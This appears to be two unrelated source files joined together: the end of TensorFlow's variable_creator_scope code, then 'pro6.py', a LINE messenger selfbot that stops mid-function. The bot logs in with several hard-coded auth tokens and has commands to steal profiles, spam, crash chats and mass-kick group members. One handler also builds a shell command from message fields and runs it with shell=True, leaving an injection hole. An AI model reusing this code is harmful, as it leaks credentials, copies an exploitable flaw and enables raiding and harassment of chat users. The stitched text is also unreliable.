value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
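# Minimal creator sketch (illustrative; `prefixing_creator` is a
# hypothetical name): a composable creator that rewrites kwargs before
# deferring to the next creator in line, as the docstring above asks.
#
#   def prefixing_creator(next_creator, **kwargs):
#     kwargs["name"] = "tagged_" + (kwargs.get("name") or "Variable")
#     return next_creator(**kwargs)
#
#   with tf.variable_creator_scope(prefixing_creator):
#     v = variable(1.0)  # `variable` is the forwarding alias defined above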
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
pro6.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
#tinkerbell
cl = LINETCR.LINE()
cl.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
cl.loginResult()
kt = LINETCR.LINE()
kt.login(token="EnnlBHTi4QbQKi1Xqla3.TrVjFf5pyd8D+ZxPusvq0W.HDtFuFulskxycJocqYbAK9krFT5ixRMAnrjU3XcDogI=")
kt.loginResult()
ks = LINETCR.LINE()
ks.login(token="EnlRYqL4DlWKIr9dfIU2.WUI0jVzzeewupQ5tboz8mG.K5G366kQX+YWWdGRGXAwMU2rHcF2hhu0Lm3JmSNUPKI=")
ks.loginResult()
ki = LINETCR.LINE()
ki.login(token="En8i8ZAR1hsJLRcqWJB7.7aNdCEtbMUaAO9Hiv0qoTW.WOSasGBkESFnM7P/TCYn6cTcF2U7Lgr396M1Yt/z8qo=")
ki.loginResult()
kk = LINETCR.LINE()
kk.login(token="EnrNejwvrgZlyCoYjSdc.SJRuNecAXNC8sHurfor2ha.jD7wclOBbItb9PXfzVA4BhBq5AkfkfdpkQBVbAigijw=")
kk.loginResult()
kc = LINETCR.LINE()
kc.login(token="EnXJYMPRuZKWp81hPsk2.buJLD7JrrngDnMf5qDfqyG.60g8dV2Qm2DALXdsVgdjfN7PLoRXoNEm9dLRphHFgjM=")
kc.loginResult()
# kicker ghost (kl is a spare client, deliberately left out of the Bots list)
kl = LINETCR.LINE()
kl.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
kl.loginResult()
print "(☆─┅═ই╬adhi☆)(2 s"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage= """
✍️MODIFIER✍️
🔑❂͜͡➣ Bot1 rename:[text]
🔑❂͜͡➣ Bot2 rename:[text]
🔑❂͜͡➣ Bot3 rename:[text]
🔑❂͜͡➣ Bot4 rename:[text]
🔑❂͜͡➣ Bot5 rename:[text]
🔑❂͜͡➣ Bot6 rename:[text]
🔑❂͜͡➣ All rename:[text]
🔑❂͜͡➣ Allbio:[text]
🔑❂͜͡➣ Bot1 clone @[name]
🔑❂͜͡➣ Bot2 clone @[name]
🔑❂͜͡➣ Bot3 clone @[name]
🔑❂͜͡➣ Bot4 clone @[name]
🔑❂͜͡➣ Bot5 clone @[name]
🔑❂͜͡➣ Bot6 clone @[name]
🔑❂͜͡➣ Comment:[text]
🔑❂͜͡➣ Message:[text]
🔑❂͜͡➣ Bot1-6 backup run
🔑❂͜͡➣ Bot1-6 backup
🔑❂͜͡➣ Group name:[text]
🔆═══════════════════🔆
🔏️PROMOTE/DEMOTE🔏
🔏❂͜͡➣ Admin on @[name]
🔏❂͜͡➣ Expel on @[name]
🔏❂͜͡➣ Expelall
💥═══════════════════💥
🔆️STEALING✍🔆
💀❂͜͡➣ Steal name @[name]
💀❂͜͡➣ Steal Bio @[name]
💀❂͜͡➣ Steal status @[name]
💀❂͜͡➣ Steal mid @[name]
💀❂͜͡➣ Steal contact @[name]
💀❂͜͡➣ Steal cover @[name]
💀❂͜͡➣ Steal pict @[name]
💀❂͜͡➣ Steal group pict
💀❂͜͡➣ Midpict:[mid]
💀❂͜͡➣ Copy @[name]
💀❂͜͡➣ Kembali ke asli
💀👻═════════════👻
👿️GUARD MODE👿
👿❂͜͡➣ Protect:low
👿❂͜͡➣ Protect:hight
👻════════════👻
👺MARK TO LIST👺
📲❂͜͡➣ Ban @[name]
📲❂͜͡➣ Unban @[name]
📲❂͜͡➣ Ban group:
📲❂͜͡➣ Del ban:
📲❂͜͡➣ List ban group
📲❂͜͡➣ Banned[send contact]
📲❂͜͡➣ Unbanned[send contact]
📲❂͜͡➣ Ban repeat @[name]
📲❂͜͡➣ Blacklist all
📲❂͜͡➣ Ban cek
📲❂͜͡➣ Clear banlist
📲❂͜͡➣ Mimic target @[name]
📲❂͜͡➣ Mimic untarget @[name]
📲❂͜͡➣ Add friend @[name]
📲❂͜͡➣ Target @[name]
📲❂͜͡➣ Del target @[name]
📲❂͜͡➣ Target list
💿══════════════💿
🎲️INVITATION🎲
⛄❂͜͡➣ Invite:[mid]
⛄❂͜͡➣ Invite user[contact]
⛄❂͜͡➣ Invite me
⛄❂͜͡➣ Join all
⛄❂͜͡➣ Join group
🌞═════════════🌞
🌛️LEAVE GROUP🌜
🔄❂͜͡➣ Bot2 @bye
🔄❂͜͡➣ Bot3 @bye
🔄❂͜͡➣ Bot4 @bye
🔄❂͜͡➣ Bot5 @bye
🔄❂͜͡➣ Bot6 @bye
🔄❂͜͡➣ Bye all
🔄❂͜͡➣ Center @bye
🔄❂͜͡➣ Bye allgroups[own]
🔄❂͜͡➣ Leave group:
⚡══════════════⚡
🍃️BOT AUTO SETTINGS🍃
☔❂͜͡➣ Auto join:on/off
☔❂͜͡➣ Auto leave:on/off
☔❂͜͡➣ Auto like:on/off
☔❂͜͡➣ Welcome message:on/off
☔❂͜͡➣ Auto notice:on/off
☔❂͜͡➣ Blockinvite:on/off
☔❂͜͡➣ Auto blockqr:on/off
☔❂͜͡➣ Namelock:on/off
☔❂͜͡➣ Mimic:on/off
☔❂͜͡➣ Auto add:on/off
☔❂͜͡➣ Check message
☔❂͜͡➣ Add message:[text]
☔❂͜͡➣ Comment:on/off
☔❂͜͡➣ Add comment:[text]
☔❂͜͡➣ Check comment
☔❂͜͡➣ Backup:on/off
☔❂͜͡➣ Gcancel:[number]
☔❂͜͡➣ Update welcome:[text]
☔❂͜͡➣ Check welcome message
🍃═════════════🍃
🌻CANCEL MODE🌻
🌽❂͜͡➣ Rejectall
🌽❂͜͡➣ Clean invites
🌽❂͜͡➣ Clear invites
🍄═════════════🍄
🍄️SUPRISE GIFT🍄
🍄❂͜͡➣ gift1-15
🍄❂͜͡➣ Spam gift
🍇═════════════🍇
🍇️NOTIFICATION LIST🍇
🍄❂͜͡➣ Group list
🍄❂͜͡➣ Banlist
🍄❂͜͡➣ Admin list
🍄❂͜͡➣ Settings
🍄❂͜͡➣ Ginfo
🍄❂͜͡➣ TL:[text]
🍄❂͜͡➣ Mimic list
🍄❂͜͡➣ Details grup:
🍄❂͜͡➣ Crash
🍄❂͜͡➣ Add all
😈════════════😈
😈★KICKER MODE★😈
😈❂͜͡➣ Cleanse
😈❂͜͡➣ Vkick @
😈❂͜͡➣ Nk [name]
😈❂͜͡➣ Kick:[mid]
😈❂͜͡➣ Purge
😈❂͜͡➣ Ulti
😈❂͜͡➣ Recover
😈═════════════😈
👮️CHAT RELATED👮
👾❂͜͡➣ Spamg[on/off][no][txt]
👾❂͜͡➣ Spam add:[text]
👾❂͜͡➣ Spam change:[text]
👾❂͜͡➣ Spam start:[number]
👾❂͜͡➣ Say [text]
👾❂͜͡➣ Me
👾❂͜͡➣ Speed
👾❂͜͡➣ Debug speed
👾❂͜͡➣ My mid
👾❂͜͡➣ Gcreator
👾❂͜͡➣ Halo
👾❂͜͡➣ Bot contact
👾❂͜͡➣ Bot mid
👾❂͜͡➣ Creator
👾❂͜͡➣ System
👾❂͜͡➣ Iconfig
👾❂͜͡➣ Kernel
👾❂͜͡➣ Cpu
👾❂͜͡➣ Responsename
👾❂͜͡➣ Help
👾❂͜͡➣ Mc:[mid]
💃═════════════💃
⌚️UTILITY⌚
💊❂͜͡➣ Lurking
💊❂͜͡➣ Lurking result
💊❂͜͡➣ Setlastpoint
💊❂͜͡➣ Viewlastseen
💊❂͜͡➣ Link open
💊❂͜͡➣ Link close
💊❂͜͡➣ Gurl
💊❂͜͡➣ Remove chat
💊❂͜͡➣ Bot restart
💰═════════════💰
🚬️CHAT RELATED🚬
💣❂͜͡➣ Lyric [][]
💣❂͜͡➣ Music [][]
💣❂͜͡➣ Wiki [text]
💣❂͜͡➣ Vidio [text]
💣❂͜͡➣ Youtube [text]
💣❂͜͡➣ Instagram [text]
💣❂͜͡➣ Translate-idn [text]
💣❂͜͡➣ Translate-eng [text]
💣❂͜͡➣ Translate-thai [text]
💣❂͜͡➣ Translate-japan [text]
💣❂͜͡➣ Emoji [expression]
💣❂͜͡➣ Info @[name]
💣❂͜͡➣ Ping
💣❂͜͡➣ Time
💣❂͜͡➣ apakah
💣❂͜͡➣ Sticker [expression]
💣❂͜͡➣ Mention all
💣❂͜͡➣ /say
💣❂͜͡➣ /say-en
💣❂͜͡➣ /say-jp
💣❂͜͡➣ Dosa @
💣❂͜͡➣ /
💣❂͜͡➣ Siapa
💰══════════════💰
📝️BROADCASTING📝
💭❂͜͡➣ Pm cast [text]
💭❂͜͡➣ Broadcast [text]
💭❂͜͡➣ Spam @[name]
🎲═════════════🎲
📲️special command📲
📲❂͜͡➣ Turn off bots
╔═══════════════════╗
☬ ᎢᎻX FᎾᎡ ᎷY ᎢᎬᎪᎷ ☬
☬ (☆─┅═ই╬ BABANG~ADHI☆)(2 s ☬Creator by https://line.me/ti/p/~boy29putra
╚═══════════════════╝
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid
["u350cc7408cc6cc82e056ee046131f925"]
Amid = ki.getProfile().mid
["ub51bc97c5e4f603f1dff35e9512550d3"]
Bmid = kk.getProfile().mid
["uc2e8b426f6591045943eae5304e67c32"]
Cmid = kc.getProfile().mid
["uec09c371e4c19ae01aa3d84857440eb7"]
Dmid = ks.getProfile().mid
["ub23ad49c409ac6773c4a151114e4761c"]
Emid = kt.getProfile().mid
["u0548e577b8d144d19d36617941d15062"]
Fmid = kl.getProfile().mid
["u350cc7408cc6cc82e056ee046131f925"]
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid]
admin =["u350cc7408cc6cc82e056ee046131f925", "ub51bc97c5e4f603f1dff35e9512550d3"]
owner = ["u350cc7408cc6cc82e056ee046131f925", "ub51bc97c5e4f603f1dff35e9512550d3"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by ღḯḉḯη-тєαм",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
wait3 = {
"copy":False,
"copy2":"target",
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = wait2['setTime']
# Note: each block below reuses the same `contact`/`backup` globals, so
# after this sequence they hold kt's profile (the last one assigned).
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kt.getProfile()
backup = kt.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload an image to imgur via the passed client. Note: `album` and
`image_path` must be defined at module scope before this helper runs;
they are not set anywhere in this file.
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
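# Example (illustrative): yt("daft punk") returns a list of short links
# such as ["youtu.be/abc123", ...] scraped from the results page; an
# empty query falls back to the hard-coded default search above.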
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
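# Note (illustrative): the MENTION contentMetadata built above is a JSON
# string shaped like
#   {"MENTIONEES": [{"S": "14", "E": "16", "M": "<member mid>"}, ...]}
# where S/E are offsets of each "@x" placeholder in msg.text and M is
# the mid being tagged.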
# The helpers below (sendMessage, sendText, sendImage, sendImageWithURL,
# post_content) take `self` and appear to be copied from the LINETCR
# client class; as written they are unbound functions at module level.
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))  # fixed: randint lives in the random module
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:  # binary mode so image bytes are not mangled
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
# Note: depends on module-level `profile` and `messageReq` (defined
# elsewhere); it builds a Message and bumps the per-chat counter but
# never hands the message to the client itself. Two identical copies of
# this definition were removed above; this final one is what Python keeps.
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][op.param1] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')  # fixed: `msg` is not defined here; op.param1 is the group id
else:
pass
except:
pass
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in Bots:  # assumption: `ken` was undefined; the Bots whitelist seems intended
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: use this branch's ticket, not a stale one
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: use this branch's ticket
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)  # fixed: `kd` was undefined; Dmid belongs to ks
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)  # fixed: `ke` was undefined; Emid belongs to kt
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: ks is the invitee here
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = cl.getGroup(op.param1)  # assumption: `kf` was undefined; the inviter in this branch is cl
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
kt.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: kt is the invitee here
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: use this branch's ticket
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: use this branch's ticket
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: `CL` was undefined; use cl and this branch's ticket
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)  # fixed: use this branch's ticket
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
#===========================================
if op.type == 32:
if op.param2 not in Bots and op.param2 not in admin:  # fixed: `and admin` was always truthy, so admins were not exempted
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
